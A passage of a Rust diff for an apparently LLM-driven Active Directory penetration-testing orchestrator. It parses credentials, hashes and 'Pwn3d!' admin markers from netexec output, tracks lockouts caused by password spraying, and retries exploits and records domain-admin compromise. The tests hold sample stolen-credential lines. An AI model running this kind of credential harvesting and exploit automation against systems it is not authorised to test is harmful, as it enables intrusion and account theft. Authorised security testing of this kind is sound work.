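/// True when the tool-call arguments show hash-based auth: the echoed
/// secret on success lines is then a hash, not a password, and the
/// plaintext-credential regexes must be skipped.
fn is_hash_auth(arguments: Option<&Value>) -> bool {
    let Some(obj) = arguments.and_then(Value::as_object) else {
        return false;
    };
    obj.iter().any(|(k, v)| {
        let hash_key = matches!(
            k.to_lowercase().as_str(),
            "hash" | "hashes" | "nthash" | "lmhash" | "ntlm_hash" | "nt_hash" | "lm_hash"
        );
        hash_key
            && match v {
                Value::String(s) => !s.trim().is_empty(),
                Value::Array(a) => !a.is_empty(),
                Value::Null => false,
                _ => true,
            }
    })
}
```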
+ let mut tool_outputs: Vec<output_extraction::ToolOutputCtx> = Vec::new(); if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { for item in arr { if let Some(s) = item.as_str() { - text_parts.push(s); - } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { - text_parts.push(s); + tool_outputs.push(output_extraction::ToolOutputCtx { + arguments: None, + output: s, + }); + } else if let Some(obj) = item.as_object() { + let Some(s) = obj.get("output").and_then(|v| v.as_str()) else { + continue; + }; + tool_outputs.push(output_extraction::ToolOutputCtx { + arguments: obj.get("arguments"), + output: s, + }); } } } - if text_parts.is_empty() { + if tool_outputs.is_empty() { return; } @@ -372,8 +684,8 @@ async fn extract_from_raw_text( // context across unrelated tool calls — a joined string caused false // credential attribution (e.g. john.smith:Summer2025 from stale context). let mut extracted = output_extraction::TextExtractions::default(); - for part in &text_parts { - let partial = output_extraction::extract_from_output_text(part, default_domain); + for ctx in &tool_outputs { + let partial = output_extraction::extract_from_output_text(ctx, default_domain); extracted.credentials.extend(partial.credentials); extracted.hashes.extend(partial.hashes); extracted.hosts.extend(partial.hosts); @@ -389,9 +701,11 @@ for cred in extracted.credentials { let is_cracked = cred.source.starts_with("cracked:"); - let cracked_username = cred.username.clone(); - let cracked_domain = cred.domain.clone(); - let cracked_password = cred.password.clone(); + let source = cred.source.clone(); + let username = cred.username.clone(); + let domain = cred.domain.clone(); + let password = cred.password.clone(); + let is_admin = cred.is_admin; match dispatcher .state .publish_credential(&dispatcher.queue, cred) { Ok(true) => { new_count += 1; + create_credential_timeline_event(dispatcher, &source, &username, &domain, is_admin) + .await; // When a cracked credential is published, update the corresponding // hash's cracked_password field in state and Redis. if is_cracked { @@ -406,9 +722,9 @@ .state .update_hash_cracked_password( &dispatcher.queue, - &cracked_username, - &cracked_domain, - &cracked_password, + &username, + &domain, + &password, ) .await; } @@ -419,8 +735,24 @@ for hash in extracted.hashes { + let username = hash.username.clone(); + let domain = hash.domain.clone(); + let hash_type = hash.hash_type.clone(); + let hash_value = hash.hash_value.clone(); + let source = hash.source.clone(); match dispatcher.state.publish_hash(&dispatcher.queue, hash).await { - Ok(true) => new_count += 1, + Ok(true) => { + new_count += 1; + create_hash_timeline_event( + dispatcher, + &username, + &domain, + &hash_type, + &hash_value, + &source, + ) + .await; + } Ok(false) => {} Err(e) => warn!(err = %e, "Failed to publish text-extracted hash"), } @@ -454,9 +786,9 @@ // immediate high-priority secretsdump. // Check each tool output independently (joining is safe here — Pwn3d! is a // standalone marker with no stateful context to leak).
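+ // e.g. "[+] CONTOSO\\admin:P@ssw0rd! (Pwn3d!)" — the same fixture the + // parse_pwned_line tests in result_processing/tests.rs exercise.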
- for part in &text_parts { - if part.contains("Pwn3d!") { - detect_and_upgrade_admin_credentials(part, dispatcher).await; + for ctx in &tool_outputs { + if ctx.output.contains("Pwn3d!") { + detect_and_upgrade_admin_credentials(ctx.output, dispatcher).await; } } diff --git a/ares-cli/src/orchestrator/result_processing/parsing.rs b/ares-cli/src/orchestrator/result_processing/parsing.rs index 8a0d1c1b..27dc43d4 100644 --- a/ares-cli/src/orchestrator/result_processing/parsing.rs +++ b/ares-cli/src/orchestrator/result_processing/parsing.rs @@ -107,7 +107,14 @@ pub(crate) fn parse_discoveries(payload: &Value) -> ParsedDiscoveries { } } // Users -- defense-in-depth: only accept entries with a parser-verified source. - const TRUSTED_USER_SOURCES: &[&str] = &["kerberos_enum", "netexec_user_enum"]; + const TRUSTED_USER_SOURCES: &[&str] = &[ + "kerberos_enum", + "netexec_user_enum", + "ldap_group_enumeration", + "acl_discovery", + "foreign_group_enumeration", + "ldap_enumeration", + ]; if let Some(users) = payload.get("discovered_users").and_then(|v| v.as_array()) { for user_val in users { if let Ok(user) = serde_json::from_value::(user_val.clone()) { diff --git a/ares-cli/src/orchestrator/result_processing/tests.rs b/ares-cli/src/orchestrator/result_processing/tests.rs index 42e46699..0f3a01e4 100644 --- a/ares-cli/src/orchestrator/result_processing/tests.rs +++ b/ares-cli/src/orchestrator/result_processing/tests.rs @@ -3,9 +3,84 @@ use super::admin_checks::{ }; use super::parsing::{has_domain_admin_indicator, parse_discoveries, resolve_parent_id}; use super::timeline::{credential_techniques, hash_techniques, is_critical_hash}; +use super::{result_has_credential_evidence, result_has_parser_evidence}; use ares_core::models::{Credential, Hash}; use serde_json::json; +#[test] +fn parser_evidence_requires_discoveries_key() { + // No payload at all → no evidence + assert!(!result_has_parser_evidence(&None)); + // Payload without discoveries → no evidence + assert!(!result_has_parser_evidence(&Some(json!({"summary": "ok"})))); + // Empty discoveries object → no evidence + assert!(!result_has_parser_evidence(&Some( + json!({"discoveries": {}}) + ))); + // Empty arrays → no evidence + assert!(!result_has_parser_evidence(&Some( + json!({"discoveries": {"credentials": [], "hashes": []}}) + ))); +} + +#[test] +fn parser_evidence_accepts_any_populated_array() { + for key in [ + "credentials", + "hashes", + "hosts", + "shares", + "vulnerabilities", + "delegations", + "trusts", + "users", + "spns", + ] { + let payload = json!({"discoveries": {key: [{"placeholder": true}]}}); + assert!( + result_has_parser_evidence(&Some(payload)), + "key {key} should count as parser evidence" + ); + } +} + +#[test] +fn credential_evidence_only_credentials_or_hashes() { + // Only hosts → not credential evidence + assert!(!result_has_credential_evidence(&Some( + json!({"discoveries": {"hosts": [{"ip": "192.168.58.10"}]}}) + ))); + // Credentials present → credential evidence + assert!(result_has_credential_evidence(&Some( + json!({"discoveries": {"credentials": [{"username": "admin"}]}}) + ))); + // Hashes present → credential evidence + assert!(result_has_credential_evidence(&Some( + json!({"discoveries": {"hashes": [{"username": "admin"}]}}) + ))); + // Vulnerabilities alone are NOT credential evidence (would be parser evidence) + assert!(!result_has_credential_evidence(&Some( + json!({"discoveries": {"vulnerabilities": [{"vuln_id": "v1"}]}}) + ))); +} + +#[test] +fn llm_findings_field_is_not_treated_as_evidence() { + // 
LLM-fabricated findings live under `llm_findings`, never `discoveries`. + // The grounding check must IGNORE them. + let payload = json!({ + "summary": "claimed exploit success", + "llm_findings": [{ + "vulnerabilities": [{ + "vuln_id": "finding_kerberoastable_account_192_168_58_10", + "vuln_type": "kerberoastable_account", + }] + }] + }); + assert!(!result_has_parser_evidence(&Some(payload.clone()))); + assert!(!result_has_credential_evidence(&Some(payload))); +} + #[test] fn parse_credentials_array() { let payload = json!({ @@ -669,6 +744,8 @@ fn parse_shares_with_comment() { assert_eq!(parsed.shares[0].comment, "Logon server share"); } +// --- parse_pwned_line tests --- + #[test] fn pwned_line_standard_format() { let line = "[+] CONTOSO\\admin:P@ssw0rd! (Pwn3d!)"; @@ -745,6 +822,8 @@ fn pwned_line_username_with_special_chars() { ); } +// --- extract_ip_from_line tests --- + #[test] fn extract_ip_basic() { let line = "SMB 192.168.58.10 445 DC01 [+] CONTOSO\\admin (Pwn3d!)"; @@ -789,6 +868,8 @@ fn extract_ip_boundary_values() { assert_eq!(extract_ip_from_line(line), Some("0.0.0.0".to_string())); } +// --- has_golden_ticket_indicator tests --- + #[test] fn golden_ticket_indicator_present() { let text = "Saving ticket in administrator.ccache"; @@ -818,6 +899,8 @@ fn golden_ticket_indicator_both_present_not_adjacent() { assert!(has_golden_ticket_indicator(text)); } +// --- resolve_da_path tests --- + #[test] fn da_path_explicit_flag_with_path() { let payload = json!({ @@ -863,6 +946,8 @@ fn da_path_null_flag_defaults_to_krbtgt() { ); } +// --- credential_techniques tests --- + #[test] fn credential_techniques_admin_base() { let t = credential_techniques("manual", true); @@ -920,6 +1005,8 @@ fn credential_techniques_empty_source() { assert_eq!(t, vec!["T1552"]); } +// --- hash_techniques tests --- + #[test] fn hash_techniques_base() { let t = hash_techniques("aabbccdd", "ntlm", "manual"); @@ -1005,6 +1092,8 @@ fn hash_techniques_as_rep_hyphenated_source() { assert!(t.contains(&"T1558.004".to_string())); } +// --- is_critical_hash tests --- + #[test] fn critical_hash_krbtgt() { assert!(is_critical_hash("krbtgt")); @@ -1036,3 +1125,104 @@ fn critical_hash_partial_match() { assert!(!is_critical_hash("krbtgt_backup")); assert!(!is_critical_hash("admin")); } + +#[test] +fn extract_locked_users_basic_netexec_format() { + use super::extract_locked_usernames_from_result; + let payload = json!({ + "tool_outputs": [ + "SMB 192.168.58.10 445 DC01 [-] CONTOSO\\testuser1:testuser1 STATUS_ACCOUNT_LOCKED_OUT\n\ + SMB 192.168.58.10 445 DC01 [+] CONTOSO\\testuser3:testuser3 (Pwn3d!)\n\ + SMB 192.168.58.10 445 DC01 [-] CONTOSO\\testuser2:testuser2 STATUS_ACCOUNT_LOCKED_OUT" + ] + }); + let mut locked = extract_locked_usernames_from_result(&Some(payload)); + locked.sort(); + assert_eq!( + locked, + vec![ + ("testuser1".to_string(), Some("contoso".to_string())), + ("testuser2".to_string(), Some("contoso".to_string())), + ] + ); +} + +#[test] +fn extract_locked_users_kdc_revoked_format() { + use super::extract_locked_usernames_from_result; + let payload = json!({ + "summary": "[-] CONTOSO\\testuser1:testuser1 KDC_ERR_CLIENT_REVOKED" + }); + let locked = extract_locked_usernames_from_result(&Some(payload)); + assert_eq!( + locked, + vec![("testuser1".to_string(), Some("contoso".to_string()))] + ); +} + +#[test] +fn extract_locked_users_skips_disabled_builtins() { + use super::extract_locked_usernames_from_result; + let payload = json!({ + "tool_outputs": [ + "[-] CONTOSO\\Guest:Guest STATUS_ACCOUNT_LOCKED_OUT\n\ + 
[-] CONTOSO\\krbtgt:krbtgt STATUS_ACCOUNT_LOCKED_OUT\n\ + [-] CONTOSO\\testuser1:testuser1 STATUS_ACCOUNT_LOCKED_OUT" + ] + }); + let locked = extract_locked_usernames_from_result(&Some(payload)); + assert_eq!( + locked, + vec![("testuser1".to_string(), Some("contoso".to_string()))] + ); +} + +#[test] +fn extract_locked_users_dedups_repeats() { + use super::extract_locked_usernames_from_result; + let payload = json!({ + "tool_outputs": [ + "[-] CONTOSO\\testuser1:testuser1 STATUS_ACCOUNT_LOCKED_OUT\n\ + [-] CONTOSO\\testuser1:testuser1 STATUS_ACCOUNT_LOCKED_OUT" + ] + }); + let locked = extract_locked_usernames_from_result(&Some(payload)); + assert_eq!(locked.len(), 1); +} + +#[test] +fn extract_locked_users_no_matches_returns_empty() { + use super::extract_locked_usernames_from_result; + let payload = json!({ + "tool_outputs": ["[+] CONTOSO\\testuser1:testuser1 (Pwn3d!)"] + }); + let locked = extract_locked_usernames_from_result(&Some(payload)); + assert!(locked.is_empty()); +} + +#[test] +fn extract_locked_users_rejects_bare_principal() { + use super::extract_locked_usernames_from_result; + // Bare `user:pass` (no DOMAIN\ prefix) is rejected — netexec always + // emits the canonical `DOMAIN\user:pass` form on auth events. + let payload = json!({ + "summary": "[-] testuser1:testuser1 STATUS_ACCOUNT_LOCKED_OUT" + }); + let locked = extract_locked_usernames_from_result(&Some(payload)); + assert!(locked.is_empty()); +} + +#[test] +fn extract_locked_users_rejects_llm_narrative_tokens() { + use super::extract_locked_usernames_from_result; + // LLM summary text often contains `word:` tokens (technique names, + // password values, list bullets) that are not principals. The + // backslash gate prevents these from being misclassified. + let payload = json!({ + "summary": "1) username_as_password: returned STATUS_ACCOUNT_LOCKED_OUT\n\ + Notable: P@ssw0rd1 spray got STATUS_ACCOUNT_LOCKED_OUT\n\ + auth: failed with STATUS_ACCOUNT_LOCKED_OUT" + }); + let locked = extract_locked_usernames_from_result(&Some(payload)); + assert!(locked.is_empty(), "got false positives: {locked:?}"); +} diff --git a/ares-cli/src/orchestrator/result_processing/timeline.rs b/ares-cli/src/orchestrator/result_processing/timeline.rs index 6231da75..843bc370 100644 --- a/ares-cli/src/orchestrator/result_processing/timeline.rs +++ b/ares-cli/src/orchestrator/result_processing/timeline.rs @@ -115,10 +115,140 @@ pub(crate) async fn create_hash_timeline_event( .await; } +/// Emit a timeline event when a credential is upgraded to admin (Pwn3d! detected). +pub(crate) async fn create_admin_upgrade_timeline_event( + dispatcher: &Arc<Dispatcher>, + username: &str, + domain: &str, +) { + let techniques = vec!["T1078".to_string()]; // Valid Accounts + let event_id = format!( + "evt-admin-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "admin_upgrade", + "description": format!("Admin access confirmed: {domain}\\{username} (Pwn3d!)"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +/// Emit a timeline event when a vulnerability is exploited.
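+/// +/// Illustrative call (editor's sketch; the vuln and task IDs are hypothetical): +/// +/// ```ignore +/// create_exploitation_timeline_event(&dispatcher, "esc1_ca01_template", "task-123").await; +/// ```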
+pub(crate) async fn create_exploitation_timeline_event( + dispatcher: &Arc<Dispatcher>, + vuln_id: &str, + task_id: &str, +) { + let techniques = exploitation_techniques(vuln_id); + let event_id = format!( + "evt-exploit-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "exploitation", + "description": format!("Vulnerability exploited: {vuln_id} (task {task_id})"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +/// Emit a timeline event for lateral movement via S4U/delegation. +pub(crate) async fn create_lateral_movement_timeline_event( + dispatcher: &Arc<Dispatcher>, + target: &str, + _ticket_path: &str, +) { + let techniques = vec![ + "T1550.003".to_string(), // Use Alternate Authentication Material: Pass the Ticket + "T1021".to_string(), // Remote Services + ]; + let event_id = format!( + "evt-lateral-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "s4u_lateral_movement", + "description": format!("Lateral movement via S4U delegation to {target}"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +/// Emit a timeline event when Domain Admin is achieved. +pub(crate) async fn create_domain_admin_timeline_event( + dispatcher: &Arc<Dispatcher>, + domain: &str, + path: Option<&str>, +) { + let techniques = vec![ + "T1003.006".to_string(), // OS Credential Dumping: DCSync + "T1078.002".to_string(), // Valid Accounts: Domain Accounts + ]; + let event_id = format!("evt-da-{}", &uuid::Uuid::new_v4().simple().to_string()[..8]); + let description = match path { + Some(p) => format!("CRITICAL: Domain Admin achieved for {domain} via {p}"), + None => format!("CRITICAL: Domain Admin achieved for {domain}"), + }; + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "domain_admin", + "description": description, + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +/// Map vulnerability IDs to MITRE ATT&CK technique IDs.
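+/// +/// For example (editor's sketch, hypothetical vuln_id — the `esc1` substring +/// adds T1649 on top of the T1210 base): +/// +/// ```ignore +/// assert_eq!( +/// exploitation_techniques("esc1_ca01"), +/// vec!["T1210".to_string(), "T1649".to_string()], +/// ); +/// ```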
+fn exploitation_techniques(vuln_id: &str) -> Vec<String> { + let vuln_lower = vuln_id.to_lowercase(); + let mut techniques = vec!["T1210".to_string()]; // Exploitation of Remote Services (base) + if vuln_lower.contains("constrained_delegation") { + techniques.push("T1558.003".to_string()); // Kerberoasting (S4U) + } + if vuln_lower.contains("unconstrained_delegation") { + techniques.push("T1558".to_string()); // Steal or Forge Kerberos Tickets + } + if vuln_lower.contains("mssql") { + techniques.push("T1505".to_string()); // Server Software Component + } + if vuln_lower.contains("esc1") || vuln_lower.contains("esc4") || vuln_lower.contains("esc8") { + techniques.push("T1649".to_string()); // Steal or Forge Authentication Certificates + } + if vuln_lower.contains("rbcd") { + techniques.push("T1134.001".to_string()); // Access Token Manipulation: Token Impersonation + } + if vuln_lower.contains("smb_signing") { + techniques.push("T1557.001".to_string()); // LLMNR/NBT-NS Poisoning (relay) + } + techniques +} + #[cfg(test)] mod tests { use super::*; + // --- credential_techniques --- + #[test] fn credential_techniques_admin() { let t = credential_techniques("nxc-smb", true); @@ -170,6 +300,8 @@ mod tests { assert!(t.contains(&"T1558.003".to_string())); } + // --- hash_techniques --- + #[test] fn hash_techniques_base() { let t = hash_techniques("aabbccdd", "ntlm", "manual"); @@ -236,6 +368,8 @@ mod tests { assert!(!t.contains(&"T1003.006".to_string())); } + // --- is_critical_hash --- + #[test] fn critical_hash_krbtgt() { assert!(is_critical_hash("krbtgt")); @@ -250,4 +384,54 @@ mod tests { fn critical_hash_regular_user() { assert!(!is_critical_hash("jsmith")); } + + // --- exploitation_techniques --- + + #[test] + fn exploitation_techniques_base() { + let t = exploitation_techniques("some_vuln"); + assert!(t.contains(&"T1210".to_string())); + } + + #[test] + fn exploitation_techniques_constrained_delegation() { + let t = exploitation_techniques("constrained_delegation_dc01"); + assert!(t.contains(&"T1558.003".to_string())); + } + + #[test] + fn exploitation_techniques_mssql() { + let t = exploitation_techniques("mssql_impersonation_sql01"); + assert!(t.contains(&"T1505".to_string())); + } + + #[test] + fn exploitation_techniques_esc1() { + let t = exploitation_techniques("esc1_template"); + assert!(t.contains(&"T1649".to_string())); + } + + #[test] + fn exploitation_techniques_esc4() { + let t = exploitation_techniques("esc4_template"); + assert!(t.contains(&"T1649".to_string())); + } + + #[test] + fn exploitation_techniques_rbcd() { + let t = exploitation_techniques("rbcd_dc01"); + assert!(t.contains(&"T1134.001".to_string())); + } + + #[test] + fn exploitation_techniques_smb_signing() { + let t = exploitation_techniques("smb_signing_disabled_192.168.58.10"); + assert!(t.contains(&"T1557.001".to_string())); + } + + #[test] + fn exploitation_techniques_unconstrained() { + let t = exploitation_techniques("unconstrained_delegation_ws01"); + assert!(t.contains(&"T1558".to_string())); + } } diff --git a/ares-cli/src/orchestrator/results.rs b/ares-cli/src/orchestrator/results.rs index bd1f1f02..14b0364c 100644 --- a/ares-cli/src/orchestrator/results.rs +++ b/ares-cli/src/orchestrator/results.rs @@ -13,6 +13,7 @@ use tokio::sync::{mpsc, watch}; use tracing::{debug, error, info, warn}; use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::dispatcher::CredentialInflight; use crate::orchestrator::routing::ActiveTaskTracker; use crate::orchestrator::task_queue::{TaskQueue, TaskResult};
@@ -29,6 +30,7 @@ pub struct CompletedTask { pub fn spawn_result_consumer( queue: TaskQueue, tracker: ActiveTaskTracker, + credential_inflight: CredentialInflight, config: Arc<OrchestratorConfig>, mut shutdown: watch::Receiver<bool>, ) -> (tokio::task::JoinHandle<()>, mpsc::Receiver<CompletedTask>) { @@ -48,7 +50,7 @@ break; } - match consume_cycle(&queue, &tracker, &tx).await { + match consume_cycle(&queue, &tracker, &credential_inflight, &tx).await { Ok(found) => { if consecutive_failures > 0 { info!( @@ -124,6 +126,7 @@ async fn consume_cycle( queue: &TaskQueue, tracker: &ActiveTaskTracker, + credential_inflight: &CredentialInflight, tx: &mpsc::Sender<CompletedTask>, ) -> Result<usize> { let task_ids = tracker.task_ids().await; @@ -139,8 +142,15 @@ let mut found = 0_usize; for (task_id, maybe_result) in results { if let Some(result) = maybe_result { - // Remove from tracker - tracker.remove(&task_id).await; + // Remove from tracker and release the per-credential inflight + // slot the task was holding (if any). The slot is now bound to + // the tracker entry's lifetime, so a hung tokio future never + // pins the slot indefinitely. + if let Some(removed) = tracker.remove(&task_id).await { + if let Some(ref key) = removed.credential_key { + credential_inflight.release(key).await; + } + } // Send to main loop let completed = CompletedTask { diff --git a/ares-cli/src/orchestrator/routing.rs b/ares-cli/src/orchestrator/routing.rs index 7f450c3c..df80df4a 100644 --- a/ares-cli/src/orchestrator/routing.rs +++ b/ares-cli/src/orchestrator/routing.rs @@ -15,6 +15,14 @@ pub struct ActiveTask { pub task_type: String, pub role: String, pub submitted_at: std::time::Instant, + /// `"user@domain"` when the task is gated by `CredentialInflight`. The + /// caller that successfully removes this task from the tracker is + /// responsible for releasing the corresponding slot. Carrying it on the + /// task makes the release happen even when stale-task cleanup evicts a + /// task whose spawned future is still hung — otherwise the slot leaks + /// and every subsequent task with the same credential gets deferred + /// forever. + pub credential_key: Option<String>, } /// Thread-safe tracker for all in-flight tasks. @@ -81,7 +89,6 @@ impl ActiveTaskTracker { } /// Total active tasks across all roles.
- #[cfg(test)] pub async fn total(&self) -> usize { let inner = self.inner.lock().await; inner.tasks.len() } @@ -138,6 +145,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: std::time::Instant::now(), + credential_key: None, }) .await; @@ -173,6 +181,7 @@ task_type: task_type.into(), role: role.into(), submitted_at: std::time::Instant::now(), + credential_key: None, }) .await; } @@ -191,6 +200,7 @@ task_type: "recon".into(), role: "recon".into(), submitted_at: std::time::Instant::now() - std::time::Duration::from_secs(120), + credential_key: None, }) .await; @@ -200,6 +210,7 @@ task_type: "recon".into(), role: "recon".into(), submitted_at: std::time::Instant::now(), + credential_key: None, }) .await; @@ -219,6 +230,7 @@ task_type: "recon".into(), role: "recon".into(), submitted_at: std::time::Instant::now(), + credential_key: None, }) .await; tracker @@ -227,6 +239,7 @@ task_type: "exploit".into(), role: "privesc".into(), submitted_at: std::time::Instant::now(), + credential_key: None, }) .await; @@ -245,6 +258,7 @@ task_type: "recon".into(), role: "recon".into(), submitted_at: std::time::Instant::now(), + credential_key: None, }) .await; tracker.remove("t1").await; diff --git a/ares-cli/src/orchestrator/state/dedup.rs b/ares-cli/src/orchestrator/state/dedup.rs index bf3cd920..7a6d0608 100644 --- a/ares-cli/src/orchestrator/state/dedup.rs +++ b/ares-cli/src/orchestrator/state/dedup.rs @@ -3,6 +3,7 @@ use anyhow::Result; use redis::AsyncCommands; +use ares_core::models::VulnerabilityInfo; use ares_core::state; use redis::aio::ConnectionLike; @@ -10,8 +11,23 @@ use redis::aio::ConnectionLike; use super::SharedState; use crate::orchestrator::task_queue::TaskQueueCore; +/// After this many consecutive failed exploit dispatches for the same vuln, +/// the exploitation workflow stops re-dispatching it. Set just high enough +/// to absorb transient failures (LLM hiccups, throttle bumps) while still +/// catching unsatisfiable preconditions in well under an hour: +/// 5 attempts × 120s cooldown = ~10 min ceiling per stuck vuln. +pub const MAX_EXPLOIT_FAILURES: u32 = 5; + impl SharedState { /// Mark a vulnerability as exploited. + /// + /// Also marks any vulnerabilities superseded by this exploit. A successful + /// `mssql_impersonation`/`mssql_linked_server` on a host implies the + /// host-level `mssql_access` is exploited too; a `dc_secretsdump_<domain>` + /// makes any `forest_trust_escalation` or `child_to_parent` whose + /// `target_domain == <domain>` moot — the trust-key chain was rendered + /// unnecessary because the target was reached by another path. Without + /// this, the loot view shows artificial ✗ rows whose goal was already met. pub async fn mark_exploited( &self, queue: &TaskQueueCore, vuln_id: &str, @@ -27,12 +43,31 @@ impl SharedState { operation_id, state::KEY_EXPLOITED ); + + // Compute superseded vuln_ids from in-memory discovered_vulnerabilities.
+ let superseded: Vec<String> = { + let state = self.inner.read().await; + let primary = state.discovered_vulnerabilities.get(vuln_id); + compute_superseded(vuln_id, primary, &state.discovered_vulnerabilities) + }; + let mut conn = queue.connection(); let _: () = conn.sadd(&key, vuln_id).await?; + for sid in &superseded { + let _: () = conn.sadd(&key, sid).await?; + } let _: () = conn.expire(&key, 86400).await?; let mut state = self.inner.write().await; state.exploited_vulnerabilities.insert(vuln_id.to_string()); + for sid in superseded { + tracing::info!( + primary = %vuln_id, + superseded = %sid, + "Marking superseded vulnerability as exploited" + ); + state.exploited_vulnerabilities.insert(sid); + } Ok(()) } @@ -60,6 +95,30 @@ Ok(()) } + /// Remove a dedup set entry from Redis (used to allow retries after a + /// transient failure such as auth-mismatch on enumeration). + pub async fn unpersist_dedup( + &self, + queue: &TaskQueueCore, + set_name: &str, + key: &str, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let redis_key = format!( + "{}:{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DEDUP_PREFIX, + set_name + ); + let mut conn = queue.connection(); + let _: () = conn.srem(&redis_key, key).await?; + Ok(()) + } + /// Persist MSSQL enum dispatched entry to Redis. pub async fn persist_mssql_dispatched( &self, @@ -81,18 +140,150 @@ let _: () = conn.expire(&redis_key, 86400).await?; Ok(()) } + + /// Remove an MSSQL enum dispatched entry from Redis so the next + /// `auto_mssql_detection` tick can re-publish a vuln for that host. + #[allow(dead_code)] + pub async fn unpersist_mssql_dispatched( + &self, + queue: &TaskQueueCore, + ip: &str, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let redis_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_MSSQL_ENUM_DISPATCHED + ); + let mut conn = queue.connection(); + let _: () = conn.srem(&redis_key, ip).await?; + Ok(()) + } + + /// Increment the failure counter for `vuln_id` and return the new count. + /// Called from result processing on every failed exploit task. When the + /// count reaches `MAX_EXPLOIT_FAILURES` the exploitation workflow will + /// abandon the vuln on the next pop. + pub async fn record_exploit_failure(&self, vuln_id: &str) -> u32 { + let mut state = self.inner.write().await; + let count = state + .exploit_failure_counts + .entry(vuln_id.to_string()) + .and_modify(|c| *c += 1) + .or_insert(1); + *count + } + + /// Returns true once `vuln_id` has accumulated `MAX_EXPLOIT_FAILURES` + /// consecutive failures. Checked by the exploitation workflow before + /// dispatching a vuln from the priority queue. + pub async fn is_exploit_abandoned(&self, vuln_id: &str) -> bool { + let state = self.inner.read().await; + state + .exploit_failure_counts + .get(vuln_id) + .map(|c| *c >= MAX_EXPLOIT_FAILURES) + .unwrap_or(false) + } +} + +/// Given the primary vuln being marked exploited, return additional vuln_ids +/// that this exploit logically supersedes. Pure function — no I/O — so it can +/// be unit tested directly.
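+/// +/// Sketch of the contract (editor's example; the IDs mirror the unit tests +/// below): +/// +/// ```ignore +/// // An mssql_impersonation exploit on a host also closes out the host-level +/// // mssql_access vuln for the same target: +/// let extra = compute_superseded( +/// "mssql_impersonation_192.168.58.51", +/// discovered.get("mssql_impersonation_192.168.58.51"), +/// &discovered, +/// ); +/// assert_eq!(extra, vec!["mssql_192_168_58_51".to_string()]); +/// ```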
+fn compute_superseded( + vuln_id: &str, + primary: Option<&VulnerabilityInfo>, + discovered: &std::collections::HashMap<String, VulnerabilityInfo>, +) -> Vec<String> { + let Some(primary) = primary else { + return Vec::new(); + }; + let mut out = Vec::new(); + match primary.vuln_type.as_str() { + // Host-deep MSSQL exploits supersede the host-level mssql_access vuln + // — getting EXECUTE AS or linked-server pivot proves the access path + // worked. + "mssql_impersonation" | "mssql_linked_server" | "mssql_xpcmdshell" => { + for (vid, v) in discovered { + if vid == vuln_id { + continue; + } + if v.vuln_type == "mssql_access" && v.target == primary.target { + out.push(vid.clone()); + } + } + } + // Once a domain is fully compromised via DCSync, any trust-chain or + // child-to-parent vuln whose `target_domain` is that domain is moot. + "dc_secretsdump" => { + let dominated = primary + .details + .get("domain") + .and_then(|v| v.as_str()) + .map(str::to_lowercase); + let Some(dominated) = dominated else { + return out; + }; + for (vid, v) in discovered { + if vid == vuln_id { + continue; + } + if !matches!( + v.vuln_type.as_str(), + "forest_trust_escalation" | "child_to_parent" + ) { + continue; + } + let tgt = v + .details + .get("target_domain") + .and_then(|d| d.as_str()) + .map(str::to_lowercase) + .unwrap_or_default(); + if tgt == dominated { + out.push(vid.clone()); + } + } + } + _ => {} + } + out } #[cfg(test)] mod tests { + use super::{compute_superseded, MAX_EXPLOIT_FAILURES}; use crate::orchestrator::state::SharedState; use crate::orchestrator::task_queue::TaskQueueCore; + use ares_core::models::VulnerabilityInfo; use ares_core::state::mock_redis::MockRedisConnection; + use std::collections::HashMap; fn mock_queue() -> TaskQueueCore { TaskQueueCore::from_connection(MockRedisConnection::new()) } + fn vuln(id: &str, vtype: &str, target: &str, details: &[(&str, &str)]) -> VulnerabilityInfo { + let mut d = HashMap::new(); + for (k, v) in details { + d.insert(k.to_string(), serde_json::Value::String(v.to_string())); + } + VulnerabilityInfo { + vuln_id: id.to_string(), + vuln_type: vtype.to_string(), + target: target.to_string(), + discovered_by: "test".to_string(), + discovered_at: chrono::Utc::now(), + details: d, + recommended_agent: String::new(), + priority: 1, + } + } + #[tokio::test] async fn mark_exploited_adds_to_state_and_redis() { let state = SharedState::new("op-1".to_string()); @@ -150,4 +341,194 @@ .unwrap(); assert!(members.contains("192.168.58.5")); } + + #[test] + fn supersede_mssql_impersonation_supersedes_host_access() { + let mut discovered = HashMap::new(); + discovered.insert( + "mssql_192_168_58_51".to_string(), + vuln("mssql_192_168_58_51", "mssql_access", "192.168.58.51", &[]), + ); + discovered.insert( + "mssql_impersonation_192.168.58.51".to_string(), + vuln( + "mssql_impersonation_192.168.58.51", + "mssql_impersonation", + "192.168.58.51", + &[], + ), + ); + let primary = discovered.get("mssql_impersonation_192.168.58.51"); + let out = compute_superseded("mssql_impersonation_192.168.58.51", primary, &discovered); + assert_eq!(out, vec!["mssql_192_168_58_51".to_string()]); + } + + #[test] + fn supersede_mssql_linked_server_supersedes_host_access() { + let mut discovered = HashMap::new(); + discovered.insert( + "mssql_192_168_58_254".to_string(), + 